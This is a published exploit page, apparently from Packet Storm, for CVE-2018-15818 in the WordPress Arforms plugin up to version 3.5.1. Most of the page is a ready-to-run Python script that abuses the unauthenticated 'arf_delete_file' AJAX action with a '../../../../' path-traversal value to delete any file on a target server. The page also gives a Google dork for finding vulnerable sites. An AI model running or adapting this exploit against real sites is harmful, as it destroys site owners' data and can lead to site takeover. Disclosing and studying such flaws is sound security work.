WordPress Arforms plugin versions 3.5.1 and below suffer from an arbitrary file deletion vulnerability.
eec5913d7e98c93148a427b5533b2edf6c4b543e9e8fc4ce4b3f0fd2e675535c# Exploit Title: WordPress Plugin Arforms 3.5.1 - Delete arbitrary file
# Google Dork: /plugins/arforms/
# Date: 2018-10-17
# Exploit Author: Amir Hossein Mahboubi
# Twitter: @Mahboubi66
# Vendor Homepage: https://www.arformsplugin.com/
# Version: <=3.5.1
# Tested on: Linux & Windows
# CVE : CVE-2018-15818
#!/usr/bin/python
import requests
import sys
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close"
}
print "\n"
if(len(sys.argv)<3):
print "Please enter WP URL as first argument and file address that you want to delete as second one\n\
for example if WP is installed in the root directory of www.example.com and we want to delete index.php\n\
the exploit format should be: python arforms.py www.example.com index.php"
exit()
r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
if(r.status_code==404):
print "The specified file doesn't exist on the host"
exit()
url = sys.argv[1]+'/wp-admin/admin-ajax.php'
payload = {
"action":"arf_delete_file",
"file_name":"../../../../"+sys.argv[2]
}
r = requests.post(url, data=payload, headers=headers)
if(r.status_code!=200):
print "The specified URL is not a wordpress installation or the plugin isn't installed"
else:
r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
if(r.status_code!=200):
print "Operation completed"
else:
print "The target isn't vulnerable"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed